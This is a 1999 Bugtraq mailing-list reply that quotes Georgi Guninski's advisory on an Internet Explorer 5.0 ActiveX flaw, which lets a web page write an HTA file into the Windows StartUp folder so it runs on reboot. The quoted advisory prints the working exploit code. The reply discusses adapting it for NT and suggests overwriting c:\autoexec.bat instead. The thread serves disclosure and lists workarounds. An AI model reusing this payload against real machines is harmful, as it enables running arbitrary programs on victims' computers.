Re: IE 5.0 allows executing programs

[Eric.Stevens () RP-RORER COM (STEVENS, Eric)]

This would probably work on NT machines if in the code the path referenced
pointed at the startup directory of an existing NT profile.  Unfortunately
it's impossible to guess the username of the currently logged on user, and
if you go with something "safe" (i.e. relatively likely to exist) like the
AllUsers profile, you should get blocked from doing that if permissions are
set right on NTFS (if the WINSYS drive is NTFS).  I get a JavaScript error
when I tried Georgi's code since the path "C:\Windows\Start
Menu\Programs\Startup\" does not exist.  Also this is weakened if in 95/98
the user does not use the same profile for all users logged on to the
network.  Although it does still write the file in a dangerous place, since
it will be executed or whatever if the default user profile logs on.

This only reaffirms my opinion that anyone who wishes to do something simple
when setting up a machine the first time to greatly protect themselves,
should simply change the name of their windows directory.

Also, I don't know fully how peravsive this exploit is, but if it is capable
of creating .bat filess, interresting things may be thought to happen if
instead of the path written in the exploit, one were to instead overwrite
c:\autoexec.bat.  C:\ is a pretty safe path to guess.

_____ ,----+ _________________________________ + _____
____ /      __________ eric stevens ___________ \ ____
___ /--+   _____ eric.stevens () rp-rorer com _____ \ ___
__ /      ____ rpr graphics asp design team _____ \ __
_ `----+ x-eric-conspiracy: there is no conspiracy + _

-----Original Message-----
From: Georgi Guninski [mailto:joro () NAT BG]
Sent: Saturday, August 21, 1999 12:17 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: IE 5.0 allows executing programs

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
allows executing arbitrary programs on the local machine by creating and
overwriting local files and putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type
libraries for scriptlets".
It allows creating and overwriting local files, and more putting content
in them.
There is some unneeded information in the file, but part of the content
may be chosen.
So, an HTML Application file may be created, feeded with an exploit
information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the
HTML Application file will be executed.
This vulnerability can be exploited via email.

Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html

Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins

The code is:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written
by Georgi Guninski
http://www.nat.bg/~joro&apos;);wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Regards,
Georgi Guninski
http://www.nat.bg/~joro